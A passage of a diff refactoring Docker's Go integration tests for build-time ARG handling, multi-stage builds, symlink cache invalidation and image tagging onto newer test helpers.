 	testRequires(c, DaemonIsLinux) // Windows does not support ARG
 	imgName := "bldargtest"
 	envKey := "foo"
 	envVal := "bar"
-	envValOveride := "barOverride"
-	args := []string{
-		"--build-arg", fmt.Sprintf("%s=%s", envKey, envVal),
-	}
+	envValOverride := "barOverride"
 	dockerfile := fmt.Sprintf(`FROM busybox
 		ENV %s %s
 		ARG %s
 		RUN echo $%s
 		CMD echo $%s
-        `, envKey, envValOveride, envKey, envKey, envKey)
-
-	if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || strings.Count(out, envValOveride) != 2 {
-		if err != nil {
-			c.Fatalf("build failed to complete: %q %q", out, err)
-		}
-		c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envValOveride)
+        `, envKey, envValOverride, envKey, envKey, envKey)
+	result := buildImage(imgName,
+		cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)),
+		build.WithDockerfile(dockerfile),
+	)
+	result.Assert(c, icmd.Success)
+	if strings.Count(result.Combined(), envValOverride) != 2 {
+		c.Fatalf("failed to access environment variable in output: %q expected: %q", result.Combined(), envValOverride)
 	}
 
 	containerName := "bldargCont"
-	if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); !strings.Contains(out, envValOveride) {
-		c.Fatalf("run produced invalid output: %q, expected %q", out, envValOveride)
+	if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); !strings.Contains(out, envValOverride) {
+		c.Fatalf("run produced invalid output: %q, expected %q", out, envValOverride)
 	}
 }
 
 func (s *DockerSuite) TestBuildBuildTimeArgExpansion(c *check.C) {
-	testRequires(c, DaemonIsLinux) // Windows does not support ARG
 	imgName := "bldvarstest"
 
 	wdVar := "WDIR"
@@ -5863,16 +4334,23 @@ func (s *DockerSuite) TestBuildBuildTimeArgExpansion(c *check.C) {
 	userVal := "testUser"
 	volVar := "VOL"
 	volVal := "/testVol/"
-	args := []string{
-		"--build-arg", fmt.Sprintf("%s=%s", wdVar, wdVal),
-		"--build-arg", fmt.Sprintf("%s=%s", addVar, addVal),
-		"--build-arg", fmt.Sprintf("%s=%s", copyVar, copyVal),
-		"--build-arg", fmt.Sprintf("%s=%s", envVar, envVal),
-		"--build-arg", fmt.Sprintf("%s=%s", exposeVar, exposeVal),
-		"--build-arg", fmt.Sprintf("%s=%s", userVar, userVal),
-		"--build-arg", fmt.Sprintf("%s=%s", volVar, volVal),
-	}
-	ctx, err := fakeContext(fmt.Sprintf(`FROM busybox
+	if DaemonIsWindows() {
+		volVal = "C:\\testVol"
+		wdVal = "C:\\tmp"
+	}
+
+	buildImageSuccessfully(c, imgName,
+		cli.WithFlags(
+			"--build-arg", fmt.Sprintf("%s=%s", wdVar, wdVal),
+			"--build-arg", fmt.Sprintf("%s=%s", addVar, addVal),
+			"--build-arg", fmt.Sprintf("%s=%s", copyVar, copyVal),
+			"--build-arg", fmt.Sprintf("%s=%s", envVar, envVal),
+			"--build-arg", fmt.Sprintf("%s=%s", exposeVar, exposeVal),
+			"--build-arg", fmt.Sprintf("%s=%s", userVar, userVal),
+			"--build-arg", fmt.Sprintf("%s=%s", volVar, volVal),
+		),
+		build.WithBuildContext(c,
+			build.WithFile("Dockerfile", fmt.Sprintf(`FROM busybox
 		ARG %s
 		WORKDIR ${%s}
 		ARG %s
@@ -5887,30 +4365,18 @@ func (s *DockerSuite) TestBuildBuildTimeArgExpansion(c *check.C) {
 		USER $%s
 		ARG %s
 		VOLUME ${%s}`,
-		wdVar, wdVar, addVar, addVar, copyVar, copyVar, envVar, envVar,
-		envVar, exposeVar, exposeVar, userVar, userVar, volVar, volVar),
-		map[string]string{
-			addVal:  "some stuff",
-			copyVal: "some stuff",
-		})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
+				wdVar, wdVar, addVar, addVar, copyVar, copyVar, envVar, envVar,
+				envVar, exposeVar, exposeVar, userVar, userVar, volVar, volVar)),
+			build.WithFile(addVal, "some stuff"),
+			build.WithFile(copyVal, "some stuff"),
+		),
+	)
 
-	if _, err := buildImageFromContext(imgName, ctx, true, args...); err != nil {
-		c.Fatal(err)
-	}
+	res := inspectField(c, imgName, "Config.WorkingDir")
+	c.Check(filepath.ToSlash(res), check.Equals, filepath.ToSlash(wdVal))
 
-	var resMap map[string]interface{}
 	var resArr []string
-	res := ""
-	res = inspectField(c, imgName, "Config.WorkingDir")
-	if res != filepath.ToSlash(filepath.Clean(wdVal)) {
-		c.Fatalf("Config.WorkingDir value mismatch. Expected: %s, got: %s", filepath.ToSlash(filepath.Clean(wdVal)), res)
-	}
-
-	inspectFieldAndMarshall(c, imgName, "Config.Env", &resArr)
+	inspectFieldAndUnmarshall(c, imgName, "Config.Env", &resArr)
 
 	found := false
 	for _, v := range resArr {
@@ -5924,7 +4390,8 @@ func (s *DockerSuite) TestBuildBuildTimeArgExpansion(c *check.C) {
 			envVar, envVal, resArr)
 	}
 
-	inspectFieldAndMarshall(c, imgName, "Config.ExposedPorts", &resMap)
+	var resMap map[string]interface{}
+	inspectFieldAndUnmarshall(c, imgName, "Config.ExposedPorts", &resMap)
 	if _, ok := resMap[fmt.Sprintf("%s/tcp", exposeVal)]; !ok {
 		c.Fatalf("Config.ExposedPorts value mismatch. Expected exposed port: %s/tcp, got: %v", exposeVal, resMap)
 	}
@@ -5934,7 +4401,7 @@ func (s *DockerSuite) TestBuildBuildTimeArgExpansion(c *check.C) {
 		c.Fatalf("Config.User value mismatch. Expected: %s, got: %s", userVal, res)
 	}
 
-	inspectFieldAndMarshall(c, imgName, "Config.Volumes", &resMap)
+	inspectFieldAndUnmarshall(c, imgName, "Config.Volumes", &resMap)
 	if _, ok := resMap[volVal]; !ok {
 		c.Fatalf("Config.Volumes value mismatch. Expected volume: %s, got: %v", volVal, resMap)
 	}
@@ -5946,27 +4413,25 @@ func (s *DockerSuite) TestBuildBuildTimeArgExpansionOverride(c *check.C) {
 	envKey := "foo"
 	envVal := "bar"
 	envKey1 := "foo1"
-	envValOveride := "barOverride"
-	args := []string{
-		"--build-arg", fmt.Sprintf("%s=%s", envKey, envVal),
-	}
+	envValOverride := "barOverride"
 	dockerfile := fmt.Sprintf(`FROM busybox
 		ARG %s
 		ENV %s %s
 		ENV %s ${%s}
 		RUN echo $%s
-		CMD echo $%s`, envKey, envKey, envValOveride, envKey1, envKey, envKey1, envKey1)
-
-	if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || strings.Count(out, envValOveride) != 2 {
-		if err != nil {
-			c.Fatalf("build failed to complete: %q %q", out, err)
-		}
-		c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envValOveride)
+		CMD echo $%s`, envKey, envKey, envValOverride, envKey1, envKey, envKey1, envKey1)
+	result := buildImage(imgName,
+		cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)),
+		build.WithDockerfile(dockerfile),
+	)
+	result.Assert(c, icmd.Success)
+	if strings.Count(result.Combined(), envValOverride) != 2 {
+		c.Fatalf("failed to access environment variable in output: %q expected: %q", result.Combined(), envValOverride)
 	}
 
 	containerName := "bldargCont"
-	if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); !strings.Contains(out, envValOveride) {
-		c.Fatalf("run produced invalid output: %q, expected %q", out, envValOveride)
+	if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); !strings.Contains(out, envValOverride) {
+		c.Fatalf("run produced invalid output: %q, expected %q", out, envValOverride)
 	}
 }
 
@@ -5975,19 +4440,17 @@ func (s *DockerSuite) TestBuildBuildTimeArgUntrustedDefinedAfterUse(c *check.C)
 	imgName := "bldargtest"
 	envKey := "foo"
 	envVal := "bar"
-	args := []string{
-		"--build-arg", fmt.Sprintf("%s=%s", envKey, envVal),
-	}
 	dockerfile := fmt.Sprintf(`FROM busybox
 		RUN echo $%s
 		ARG %s
 		CMD echo $%s`, envKey, envKey, envKey)
-
-	if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || strings.Contains(out, envVal) {
-		if err != nil {
-			c.Fatalf("build failed to complete: %q %q", out, err)
-		}
-		c.Fatalf("able to access environment variable in output: %q expected to be missing", out)
+	result := buildImage(imgName,
+		cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)),
+		build.WithDockerfile(dockerfile),
+	)
+	result.Assert(c, icmd.Success)
+	if strings.Contains(result.Combined(), envVal) {
+		c.Fatalf("able to access environment variable in output: %q expected to be missing", result.Combined())
 	}
 
 	containerName := "bldargCont"
@@ -6001,20 +4464,18 @@ func (s *DockerSuite) TestBuildBuildTimeArgBuiltinArg(c *check.C) {
 	imgName := "bldargtest"
 	envKey := "HTTP_PROXY"
 	envVal := "bar"
-	args := []string{
-		"--build-arg", fmt.Sprintf("%s=%s", envKey, envVal),
-	}
 	dockerfile := fmt.Sprintf(`FROM busybox
 		RUN echo $%s
 		CMD echo $%s`, envKey, envKey)
 
-	if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || !strings.Contains(out, envVal) {
-		if err != nil {
-			c.Fatalf("build failed to complete: %q %q", out, err)
-		}
-		c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envVal)
+	result := buildImage(imgName,
+		cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)),
+		build.WithDockerfile(dockerfile),
+	)
+	result.Assert(c, icmd.Success)
+	if !strings.Contains(result.Combined(), envVal) {
+		c.Fatalf("failed to access environment variable in output: %q expected: %q", result.Combined(), envVal)
 	}
-
 	containerName := "bldargCont"
 	if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); out != "\n" {
 		c.Fatalf("run produced invalid output: %q, expected empty string", out)
@@ -6026,26 +4487,24 @@ func (s *DockerSuite) TestBuildBuildTimeArgDefaultOverride(c *check.C) {
 	imgName := "bldargtest"
 	envKey := "foo"
 	envVal := "bar"
-	envValOveride := "barOverride"
-	args := []string{
-		"--build-arg", fmt.Sprintf("%s=%s", envKey, envValOveride),
-	}
+	envValOverride := "barOverride"
 	dockerfile := fmt.Sprintf(`FROM busybox
 		ARG %s=%s
 		ENV %s $%s
 		RUN echo $%s
 		CMD echo $%s`, envKey, envVal, envKey, envKey, envKey, envKey)
-
-	if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || strings.Count(out, envValOveride) != 1 {
-		if err != nil {
-			c.Fatalf("build failed to complete: %q %q", out, err)
-		}
-		c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envValOveride)
+	result := buildImage(imgName,
+		cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envValOverride)),
+		build.WithDockerfile(dockerfile),
+	)
+	result.Assert(c, icmd.Success)
+	if strings.Count(result.Combined(), envValOverride) != 1 {
+		c.Fatalf("failed to access environment variable in output: %q expected: %q", result.Combined(), envValOverride)
 	}
 
 	containerName := "bldargCont"
-	if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); !strings.Contains(out, envValOveride) {
-		c.Fatalf("run produced invalid output: %q, expected %q", out, envValOveride)
+	if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); !strings.Contains(out, envValOverride) {
+		c.Fatalf("run produced invalid output: %q, expected %q", out, envValOverride)
 	}
 }
 
@@ -6053,46 +4512,28 @@ func (s *DockerSuite) TestBuildBuildTimeArgUnconsumedArg(c *check.C) {
 	imgName := "bldargtest"
 	envKey := "foo"
 	envVal := "bar"
-	args := []string{
-		"--build-arg", fmt.Sprintf("%s=%s", envKey, envVal),
-	}
 	dockerfile := fmt.Sprintf(`FROM busybox
 		RUN echo $%s
 		CMD echo $%s`, envKey, envKey)
-
 	warnStr := "[Warning] One or more build-args"
-
-	if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); !strings.Contains(out, warnStr) {
-		c.Fatalf("build completed without warning: %q %q", out, err)
-	} else if err != nil {
-		c.Fatalf("build failed to complete: %q %q", out, err)
-	}
-
+	buildImage(imgName,
+		cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)),
+		build.WithDockerfile(dockerfile),
+	).Assert(c, icmd.Expected{
+		Out: warnStr,
+	})
 }
 
 func (s *DockerSuite) TestBuildBuildTimeArgEnv(c *check.C) {
 	testRequires(c, DaemonIsLinux) // Windows does not support ARG
-	args := []string{
-		"build",
-		"--build-arg", fmt.Sprintf("FOO1=fromcmd"),
-		"--build-arg", fmt.Sprintf("FOO2="),
-		"--build-arg", fmt.Sprintf("FOO3"), // set in env
-		"--build-arg", fmt.Sprintf("FOO4"), // not set in env
-		"--build-arg", fmt.Sprintf("FOO5=fromcmd"),
-		// FOO6 is not set at all
-		"--build-arg", fmt.Sprintf("FOO7=fromcmd"), // should produce a warning
-		"--build-arg", fmt.Sprintf("FOO8="), // should produce a warning
-		"--build-arg", fmt.Sprintf("FOO9"), // should produce a warning
-		".",
-	}
-
-	dockerfile := fmt.Sprintf(`FROM busybox
+	dockerfile := `FROM busybox
 		ARG FOO1=fromfile
 		ARG FOO2=fromfile
 		ARG FOO3=fromfile
 		ARG FOO4=fromfile
 		ARG FOO5
 		ARG FOO6
+		ARG FO10
 		RUN env
 		RUN [ "$FOO1" == "fromcmd" ]
 		RUN [ "$FOO2" == "" ]
@@ -6104,30 +4545,38 @@ func (s *DockerSuite) TestBuildBuildTimeArgEnv(c *check.C) {
 		RUN [ "$(env | grep FOO7)" == "" ]
 		RUN [ "$(env | grep FOO8)" == "" ]
 		RUN [ "$(env | grep FOO9)" == "" ]
-	    `)
-
-	ctx, err := fakeContext(dockerfile, nil)
-	c.Assert(err, check.IsNil)
-	defer ctx.Close()
-
-	cmd := exec.Command(dockerBinary, args...)
-	cmd.Dir = ctx.Dir
-	cmd.Env = append(os.Environ(),
-		"FOO1=fromenv",
-		"FOO2=fromenv",
-		"FOO3=fromenv")
-	out, _, err := runCommandWithOutput(cmd)
-	if err != nil {
-		c.Fatal(err, out)
-	}
+		RUN [ "$FO10" == "" ]
+	    `
+	result := buildImage("testbuildtimeargenv",
+		cli.WithFlags(
+			"--build-arg", fmt.Sprintf("FOO1=fromcmd"),
+			"--build-arg", fmt.Sprintf("FOO2="),
+			"--build-arg", fmt.Sprintf("FOO3"), // set in env
+			"--build-arg", fmt.Sprintf("FOO4"), // not set in env
+			"--build-arg", fmt.Sprintf("FOO5=fromcmd"),
+			// FOO6 is not set at all
+			"--build-arg", fmt.Sprintf("FOO7=fromcmd"), // should produce a warning
+			"--build-arg", fmt.Sprintf("FOO8="), // should produce a warning
+			"--build-arg", fmt.Sprintf("FOO9"), // should produce a warning
+			"--build-arg", fmt.Sprintf("FO10"), // not set in env, empty value
+		),
+		cli.WithEnvironmentVariables(append(os.Environ(),
+			"FOO1=fromenv",
+			"FOO2=fromenv",
+			"FOO3=fromenv")...),
+		build.WithBuildContext(c,
+			build.WithFile("Dockerfile", dockerfile),
+		),
+	)
+	result.Assert(c, icmd.Success)
 
 	// Now check to make sure we got a warning msg about unused build-args
-	i := strings.Index(out, "[Warning]")
+	i := strings.Index(result.Combined(), "[Warning]")
 	if i < 0 {
-		c.Fatalf("Missing the build-arg warning in %q", out)
+		c.Fatalf("Missing the build-arg warning in %q", result.Combined())
 	}
 
-	out = out[i:] // "out" should contain just the warning message now
+	out := result.Combined()[i:] // "out" should contain just the warning message now
 
 	// These were specified on a --build-arg but no ARG was in the Dockerfile
 	c.Assert(out, checker.Contains, "FOO7")
@@ -6141,7 +4590,6 @@ func (s *DockerSuite) TestBuildBuildTimeArgQuotedValVariants(c *check.C) {
 	envKey1 := "foo1"
 	envKey2 := "foo2"
 	envKey3 := "foo3"
-	args := []string{}
 	dockerfile := fmt.Sprintf(`FROM busybox
 		ARG %s=""
 		ARG %s=''
@@ -6154,10 +4602,7 @@ func (s *DockerSuite) TestBuildBuildTimeArgQuotedValVariants(c *check.C) {
 		RUN [ "$%s" != "$%s" ]`, envKey, envKey1, envKey2, envKey3,
 		envKey, envKey2, envKey, envKey3, envKey1, envKey2, envKey1, envKey3,
 		envKey2, envKey3)
-
-	if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil {
-		c.Fatalf("build failed to complete: %q %q", out, err)
-	}
+	buildImageSuccessfully(c, imgName, build.WithDockerfile(dockerfile))
 }
 
 func (s *DockerSuite) TestBuildBuildTimeArgEmptyValVariants(c *check.C) {
@@ -6166,7 +4611,6 @@ func (s *DockerSuite) TestBuildBuildTimeArgEmptyValVariants(c *check.C) {
 	envKey := "foo"
 	envKey1 := "foo1"
 	envKey2 := "foo2"
-	args := []string{}
 	dockerfile := fmt.Sprintf(`FROM busybox
 		ARG %s=
 		ARG %s=""
@@ -6174,32 +4618,96 @@ func (s *DockerSuite) TestBuildBuildTimeArgEmptyValVariants(c *check.C) {
 		RUN [ "$%s" == "$%s" ]
 		RUN [ "$%s" == "$%s" ]
 		RUN [ "$%s" == "$%s" ]`, envKey, envKey1, envKey2, envKey, envKey1, envKey1, envKey2, envKey, envKey2)
-
-	if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil {
-		c.Fatalf("build failed to complete: %q %q", out, err)
-	}
+	buildImageSuccessfully(c, imgName, build.WithDockerfile(dockerfile))
 }
 
-func (s *DockerSuite) TestBuildBuildTimeArgDefintionWithNoEnvInjection(c *check.C) {
+func (s *DockerSuite) TestBuildBuildTimeArgDefinitionWithNoEnvInjection(c *check.C) {
 	imgName := "bldargtest"
 	envKey := "foo"
-	args := []string{}
 	dockerfile := fmt.Sprintf(`FROM busybox
 		ARG %s
 		RUN env`, envKey)
 
-	if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || strings.Count(out, envKey) != 1 {
-		if err != nil {
-			c.Fatalf("build failed to complete: %q %q", out, err)
-		}
-		c.Fatalf("unexpected number of occurrences of the arg in output: %q expected: 1", out)
+	result := cli.BuildCmd(c, imgName, build.WithDockerfile(dockerfile))
+	result.Assert(c, icmd.Success)
+	if strings.Count(result.Combined(), envKey) != 1 {
+		c.Fatalf("unexpected number of occurrences of the arg in output: %q expected: 1", result.Combined())
 	}
 }
 
+func (s *DockerSuite) TestBuildMultiStageArg(c *check.C) {
+	imgName := "multifrombldargtest"
+	dockerfile := `FROM busybox
+    ARG foo=abc
+    LABEL multifromtest=1
+    RUN env > /out
+    FROM busybox
+    ARG bar=def
+    RUN env > /out`
+
+	result := cli.BuildCmd(c, imgName, build.WithDockerfile(dockerfile))
+	result.Assert(c, icmd.Success)
+
+	result = cli.DockerCmd(c, "images", "-q", "-f", "label=multifromtest=1")
+	parentID := strings.TrimSpace(result.Stdout())
+
+	result = cli.DockerCmd(c, "run", "--rm", parentID, "cat", "/out")
+	c.Assert(result.Stdout(), checker.Contains, "foo=abc")
+
+	result = cli.DockerCmd(c, "run", "--rm", imgName, "cat", "/out")
+	c.Assert(result.Stdout(), checker.Not(checker.Contains), "foo")
+	c.Assert(result.Stdout(), checker.Contains, "bar=def")
+}
+
+func (s *DockerSuite) TestBuildMultiStageGlobalArg(c *check.C) {
+	imgName := "multifrombldargtest"
+	dockerfile := `ARG tag=nosuchtag
+     FROM busybox:${tag}
+     LABEL multifromtest=1
+     RUN env > /out
+     FROM busybox:${tag}
+     ARG tag
+     RUN env > /out`
+
+	result := cli.BuildCmd(c, imgName,
+		build.WithDockerfile(dockerfile),
+		cli.WithFlags("--build-arg", fmt.Sprintf("tag=latest")))
+	result.Assert(c, icmd.Success)
+
+	result = cli.DockerCmd(c, "images", "-q", "-f", "label=multifromtest=1")
+	parentID := strings.TrimSpace(result.Stdout())
+
+	result = cli.DockerCmd(c, "run", "--rm", parentID, "cat", "/out")
+	c.Assert(result.Stdout(), checker.Not(checker.Contains), "tag")
+
+	result = cli.DockerCmd(c, "run", "--rm", imgName, "cat", "/out")
+	c.Assert(result.Stdout(), checker.Contains, "tag=latest")
+}
+
+func (s *DockerSuite) TestBuildMultiStageUnusedArg(c *check.C) {
+	imgName := "multifromunusedarg"
+	dockerfile := `FROM busybox
+    ARG foo
+    FROM busybox
+    ARG bar
+    RUN env > /out`
+
+	result := cli.BuildCmd(c, imgName,
+		build.WithDockerfile(dockerfile),
+		cli.WithFlags("--build-arg", fmt.Sprintf("baz=abc")))
+	result.Assert(c, icmd.Success)
+	c.Assert(result.Combined(), checker.Contains, "[Warning]")
+	c.Assert(result.Combined(), checker.Contains, "[baz] were not consumed")
+
+	result = cli.DockerCmd(c, "run", "--rm", imgName, "cat", "/out")
+	c.Assert(result.Stdout(), checker.Not(checker.Contains), "bar")
+	c.Assert(result.Stdout(), checker.Not(checker.Contains), "baz")
+}
+
 func (s *DockerSuite) TestBuildNoNamedVolume(c *check.C) {
 	volName := "testname:/foo"
 
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		volName = "testname:C:\\foo"
 	}
 	dockerCmd(c, "run", "-v", volName, "busybox", "sh", "-c", "touch /foo/oops")
@@ -6208,8 +4716,9 @@ func (s *DockerSuite) TestBuildNoNamedVolume(c *check.C) {
 	VOLUME ` + volName + `
 	RUN ls /foo/oops
 	`
-	_, err := buildImage("test", dockerFile, false)
-	c.Assert(err, check.NotNil, check.Commentf("image build should have failed"))
+	buildImage("test", build.WithDockerfile(dockerFile)).Assert(c, icmd.Expected{
+		ExitCode: 1,
+	})
 }
 
 func (s *DockerSuite) TestBuildTagEvent(c *check.C) {
@@ -6218,8 +4727,7 @@ func (s *DockerSuite) TestBuildTagEvent(c *check.C) {
 	dockerFile := `FROM busybox
 	RUN echo events
 	`
-	_, err := buildImage("test", dockerFile, false)
-	c.Assert(err, check.IsNil)
+	buildImageSuccessfully(c, "test", build.WithDockerfile(dockerFile))
 
 	until := daemonUnixTime(c)
 	out, _ := dockerCmd(c, "events", "--since", since, "--until", until, "--filter", "type=image")
@@ -6242,111 +4750,99 @@ func (s *DockerSuite) TestBuildMultipleTags(c *check.C) {
 	FROM busybox
 	MAINTAINER test-15780
 	`
-	cmd := exec.Command(dockerBinary, "build", "-t", "tag1", "-t", "tag2:v2",
-		"-t", "tag1:latest", "-t", "tag1", "--no-cache", "-")
-	cmd.Stdin = strings.NewReader(dockerfile)
-	_, err := runCommand(cmd)
-	c.Assert(err, check.IsNil)
+	buildImageSuccessfully(c, "tag1", cli.WithFlags("-t", "tag2:v2", "-t", "tag1:latest", "-t", "tag1"), build.WithDockerfile(dockerfile))
 
-	id1, err := getIDByName("tag1")
-	c.Assert(err, check.IsNil)
-	id2, err := getIDByName("tag2:v2")
-	c.Assert(err, check.IsNil)
+	id1 := getIDByName(c, "tag1")
+	id2 := getIDByName(c, "tag2:v2")
 	c.Assert(id1, check.Equals, id2)
 }
 
 // #17290
 func (s *DockerSuite) TestBuildCacheBrokenSymlink(c *check.C) {
 	name := "testbuildbrokensymlink"
-	ctx, err := fakeContext(`
+	ctx := fakecontext.New(c, "",
+		fakecontext.WithDockerfile(`
 	FROM busybox
-	COPY . ./`,
-		map[string]string{
+	COPY . ./`),
+		fakecontext.WithFiles(map[string]string{
 			"foo": "bar",
-		})
-	c.Assert(err, checker.IsNil)
+		}))
 	defer ctx.Close()
 
-	err = os.Symlink(filepath.Join(ctx.Dir, "nosuchfile"), filepath.Join(ctx.Dir, "asymlink"))
+	err := os.Symlink(filepath.Join(ctx.Dir, "nosuchfile"), filepath.Join(ctx.Dir, "asymlink"))
 	c.Assert(err, checker.IsNil)
 
 	// warm up cache
-	_, err = buildImageFromContext(name, ctx, true)
-	c.Assert(err, checker.IsNil)
+	cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx))
 
 	// add new file to context, should invalidate cache
 	err = ioutil.WriteFile(filepath.Join(ctx.Dir, "newfile"), []byte("foo"), 0644)
 	c.Assert(err, checker.IsNil)
 
-	_, out, err := buildImageFromContextWithOut(name, ctx, true)
-	c.Assert(err, checker.IsNil)
-
-	c.Assert(out, checker.Not(checker.Contains), "Using cache")
-
+	result := cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx))
+	if strings.Contains(result.Combined(), "Using cache") {
+		c.Fatal("2nd build used cache on ADD, it shouldn't")
+	}
 }
 
 func (s *DockerSuite) TestBuildFollowSymlinkToFile(c *check.C) {
 	name := "testbuildbrokensymlink"
-	ctx, err := fakeContext(`
+	ctx := fakecontext.New(c, "",
+		fakecontext.WithDockerfile(`
 	FROM busybox
-	COPY asymlink target`,
-		map[string]string{
+	COPY asymlink target`),
+		fakecontext.WithFiles(map[string]string{
 			"foo": "bar",
-		})
-	c.Assert(err, checker.IsNil)
+		}))
 	defer ctx.Close()
 
-	err = os.Symlink("foo", filepath.Join(ctx.Dir, "asymlink"))
+	err := os.Symlink("foo", filepath.Join(ctx.Dir, "asymlink"))
 	c.Assert(err, checker.IsNil)
 
-	id, err := buildImageFromContext(name, ctx, true)
-	c.Assert(err, checker.IsNil)
+	cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx))
 
-	out, _ := dockerCmd(c, "run", "--rm", id, "cat", "target")
+	out := cli.DockerCmd(c, "run", "--rm", name, "cat", "target").Combined()
 	c.Assert(out, checker.Matches, "bar")
 
 	// change target file should invalidate cache
 	err = ioutil.WriteFile(filepath.Join(ctx.Dir, "foo"), []byte("baz"), 0644)
 	c.Assert(err, checker.IsNil)
 
-	id, out, err = buildImageFromContextWithOut(name, ctx, true)
-	c.Assert(err, checker.IsNil)
-	c.Assert(out, checker.Not(checker.Contains), "Using cache")
+	result := cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx))
+	c.Assert(result.Combined(), checker.Not(checker.Contains), "Using cache")
 
-	out, _ = dockerCmd(c, "run", "--rm", id, "cat", "target")
+	out = cli.DockerCmd(c, "run", "--rm", name, "cat", "target").Combined()
 	c.Assert(out, checker.Matches, "baz")
 }
 
 func (s *DockerSuite) TestBuildFollowSymlinkToDir(c *check.C) {
 	name := "testbuildbrokensymlink"
-	ctx, err := fakeContext(`
+	ctx := fakecontext.New(c, "",
+		fakecontext.WithDockerfile(`
 	FROM busybox
-	COPY asymlink /`,
-		map[string]string{
+	COPY asymlink /`),
+		fakecontext.WithFiles(map[string]string{
 			"foo/abc": "bar",
 			"foo/def": "baz",
-		})
-	c.Assert(err, checker.IsNil)
+		}))
 	defer ctx.Close()
 
-	err = os.Symlink("foo", filepath.Join(ctx.Dir, "asymlink"))
+	err := os.Symlink("foo", filepath.Join(ctx.Dir, "asymlink"))
 	c.Assert(err, checker.IsNil)
 
-	id, err := buildImageFromContext(name, ctx, true)
-	c.Assert(err, checker.IsNil)
+	cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx))
 
-	out, _ := dockerCmd(c, "run", "--rm", id, "cat", "abc", "def")
+	out := cli.DockerCmd(c, "run", "--rm", name, "cat", "abc", "def").Combined()
 	c.Assert(out, checker.Matches, "barbaz")
 
 	// change target file should invalidate cache
 	err = ioutil.WriteFile(filepath.Join(ctx.Dir, "foo/def"), []byte("bax"), 0644)
 	c.Assert(err, checker.IsNil)
 
-	id, out, err = buildImageFromContextWithOut(name, ctx, true)
-	c.Assert(err, checker.IsNil)
-	c.Assert(out, checker.Not(checker.Contains), "Using cache")
+	result := cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx))
+	c.Assert(result.Combined(), checker.Not(checker.Contains), "Using cache")
 
-	out, _ = dockerCmd(c, "run", "--rm", id, "cat", "abc", "def")
+	out = cli.DockerCmd(c, "run", "--rm", name, "cat", "abc", "def").Combined()
 	c.Assert(out, checker.Matches, "barbax")
 
 }
@@ -6355,103 +4851,88 @@ func (s *DockerSuite) TestBuildFollowSymlinkToDir(c *check.C) {
 // not from the target file.
 func (s *DockerSuite) TestBuildSymlinkBasename(c *check.C) {
 	name := "testbuildbrokensymlink"
-	ctx, err := fakeContext(`
+	ctx := fakecontext.New(c, "",
+		fakecontext.WithDockerfile(`
 	FROM busybox
-	COPY asymlink /`,
-		map[string]string{
+	COPY asymlink /`),
+		fakecontext.WithFiles(map[string]string{
 			"foo": "bar",
-		})
-	c.Assert(err, checker.IsNil)
+		}))
 	defer ctx.Close()
 
-	err = os.Symlink("foo", filepath.Join(ctx.Dir, "asymlink"))
+	err := os.Symlink("foo", filepath.Join(ctx.Dir, "asymlink"))
 	c.Assert(err, checker.IsNil)
 
-	id, err := buildImageFromContext(name, ctx, true)
-	c.Assert(err, checker.IsNil)
+	cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx))
 
-	out, _ := dockerCmd(c, "run", "--rm", id, "cat", "asymlink")
+	out := cli.DockerCmd(c, "run", "--rm", name, "cat", "asymlink").Combined()
 	c.Assert(out, checker.Matches, "bar")
-
 }
 
 // #17827
 func (s *DockerSuite) TestBuildCacheRootSource(c *check.C) {
 	name := "testbuildrootsource"
-	ctx, err := fakeContext(`
+	ctx := fakecontext.New(c, "",
+		fakecontext.WithDockerfile(`
 	FROM busybox
-	COPY / /data`,
-		map[string]string{
+	COPY / /data`),
+		fakecontext.WithFiles(map[string]string{
 			"foo": "bar",
-		})
-	c.Assert(err, checker.IsNil)
+		}))
 	defer ctx.Close()
 
 	// warm up cache
-	_, err = buildImageFromContext(name, ctx, true)
-	c.Assert(err, checker.IsNil)
+	cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx))
 
 	// change file, should invalidate cache
-	err = ioutil.WriteFile(filepath.Join(ctx.Dir, "foo"), []byte("baz"), 0644)
+	err := ioutil.WriteFile(filepath.Join(ctx.Dir, "foo"), []byte("baz"), 0644)
 	c.Assert(err, checker.IsNil)
 
-	_, out, err := buildImageFromContextWithOut(name, ctx, true)
-	c.Assert(err, checker.IsNil)
+	result := cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx))
 
-	c.Assert(out, checker.Not(checker.Contains), "Using cache")
+	c.Assert(result.Combined(), checker.Not(checker.Contains), "Using cache")
 }
 
 // #19375
+// FIXME(vdemeester) should migrate to docker/cli tests
